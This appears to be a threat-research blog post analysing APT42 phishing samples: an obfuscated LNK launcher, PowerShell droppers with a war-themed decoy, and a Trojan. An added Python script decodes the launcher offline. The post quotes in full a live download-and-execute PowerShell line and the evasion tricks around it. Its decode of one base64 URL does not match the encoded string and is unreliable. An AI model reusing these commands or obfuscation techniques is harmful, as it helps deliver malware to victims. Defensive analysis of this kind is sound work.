APT42 phishing campaigns and malicious code like soldiers hiding deep in the jungle
Summary
I recently noted that the Google Threat Analysis Group was sharing insights on APT42. During 2024 I have been paying more attention to APT groups running phishing campaigns around the world; as you know, LNK files have been a popular phishing vector for delivering malware for many years, and PowerShell is now also very popular for building malware. So here I want to analyze the APT42 samples that TAG shared.
Technical analysis
SHA-256: c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3
Link information for the property store data block.
Figure 1 - Link information for property store
Extracting the link target arguments yields a long string that appears obfuscated: “C:\Windows\System32\cmd.exe /c "set mv=popdsxwerpdsxshpdsxell -wpdsx pdsx1 "$epdsxs=(wgepdsxt -Urpdsxi https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicpdsxParsing).Content;&(gcm i?x)$es" & call %mv:pdsx=%".
String replacement: %mv:pdsx=% is cmd.exe variable substitution syntax; it replaces every instance of pdsx in the mv variable with an empty string.
Resulting string: after replacement, mv contains “powershell -w 1 "$es=(wget -Uri https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicParsing).Content;&(gcm i?x)$es"”.
The -w 1 switch (-WindowStyle Hidden) hides the PowerShell window.
Obfuscation: gcm i?x is Get-Command with a wildcard that resolves to iex, the alias of Invoke-Expression, so &(gcm i?x)$es executes the downloaded content via Invoke-Expression without the strings iex or Invoke-Expression ever appearing in the command. This and the other obfuscation are intended to hide the true purpose of the code and make it harder to analyze and detect.
Conclusion: the LNK file fetches malware from the remote host https[:]//s3.tebi.io/erfs/pf2ncy.txt and executes the malicious payload.
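As an added illustration (not code from the original post), the cmd.exe substitution step above can be reproduced offline for triage: the function applies the %mv:pdsx=% replacement to the recovered argument string, pulls out the download URL, and resolves the gcm i?x wildcard against a small, assumed table of PowerShell aliases. The ALIASES table, LNK_ARGS constant and function names are mine.

```python
import re
from fnmatch import fnmatch

# Constructed sample: the cmd.exe argument string recovered from the LNK, as
# quoted in the analysis above (split across lines here for readability only).
LNK_ARGS = (
    '/c "set mv=popdsxwerpdsxshpdsxell -wpdsx pdsx1 "$epdsxs=(wgepdsxt '
    '-Urpdsxi https://s3.tebi.io/erfs/pf2ncy.txt '
    '-UseBasicpdsxParsing).Content;&(gcm i?x)$es" & call %mv:pdsx=%"'
)

# Pattern for cmd.exe's  set VAR=value & call %VAR:search=replace%  idiom.
_SET_CALL = re.compile(
    r"set\s+(?P<var>\w+)=(?P<value>.*?)\s*&\s*call\s+"
    r"%(?P<ref>\w+):(?P<search>[^=%]+)=(?P<repl>[^%]*)%",
    re.IGNORECASE | re.DOTALL,
)

# Assumed subset of built-in PowerShell aliases, used to resolve gcm wildcards.
ALIASES = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest",
           "irm": "Invoke-RestMethod", "icm": "Invoke-Command",
           "wget": "Invoke-WebRequest", "curl": "Invoke-WebRequest"}


def deobfuscate_set_call(cmdline: str) -> str:
    """Apply the %VAR:search=replace% substitution exactly as cmd.exe would."""
    m = _SET_CALL.search(cmdline)
    if not m or m["var"].lower() != m["ref"].lower():
        raise ValueError("no matching set/call substitution found")
    return m["value"].replace(m["search"], m["repl"])


def resolve_gcm(pattern: str) -> list:
    """Expand a Get-Command (gcm) wildcard such as i?x against ALIASES."""
    return sorted({full for name, full in ALIASES.items() if fnmatch(name, pattern)})


def analyse(cmdline: str) -> dict:
    """Summarise the decoded stage: what it downloads and how it runs it."""
    ps = deobfuscate_set_call(cmdline)
    wildcards = re.findall(r"gcm\s+([\w?*-]+)", ps)
    return {
        "powershell": ps,
        "urls": re.findall(r"https?://[^\s\"')]+", ps),
        # -w 1 is -WindowStyle 1, i.e. Hidden: no console window is shown
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", ps, re.I)),
        "runs_invoke_expression": any("Invoke-Expression" in resolve_gcm(w) for w in wildcards),
    }


if __name__ == "__main__":
    for key, value in analyse(LNK_ARGS).items():
        print(f"{key}: {value}")
```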
SHA-256: 33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156
This is obviously a PowerShell script. At the beginning it opens the link “https[:]//onedrive.live.com/embed?resid=204D6029500397E2%21127&authkey=!AOecuKGAdx__SEQ&em=2” in Microsoft Edge, a OneDrive file about “the war between Hamas and Israel” that serves as a decoy to attract the victim's attention and disguise the aim of the malware operator.
Figure 2 - “the war between Hamas and Israel” snippet
A notable and interesting detail is that the script defines three random PowerShell variables that have no real meaning; this is done intentionally to interfere with the analyst's work. The real, valid malicious code is embedded among them, just like soldiers hiding deep in the jungle. 😇
Figure 3 - malicious code, like soldiers hiding deep in the jungle
Extracting the real code from the chaotic code (finding the soldiers, so to speak) shows that the malicious code consists of three parts. We will discuss them in turn.
Figure 4 - the main malicious code
The bbsert function takes a base64-encoded string, decodes it, and converts the resulting byte array into a UTF-8 string. The malicious string 'iltaHR0cHM6Ly9taXhlZGludGVnZXJsaW5lYXIuYmFyYmFyYS1kZC1wYWRyb24ud29ya2Vycy5kZXY=' decodes to the URL https://mixedintegrgermlbarara-dd-pardonworkers.dev.
The malicious payload is downloaded from that URL and finally executed by the function Gorba with a parameter, a long string value that looks like a public key. You may also note the custom function Keymaster, which comes from another PowerShell file, SHA-256 4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f. That file contains only the custom function Keymaster, which accepts a parameter and uses FromBase64String and AES to decrypt it, then replaces special strings like “_____dest_____”.
Figure 5 - Keymaster
SHA-256: c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32
This is a PowerShell script with the ability to download files and extract DLLs and ZIPs, grant permissions, start processes or services, use Terminal Services, create users, configure the firewall, establish SSH tunnels, and so on, which identifies it as a Trojan.
Figure 6 - PowerShell Trojan
IOCs
End.
Labels: APT42, phishing campaigns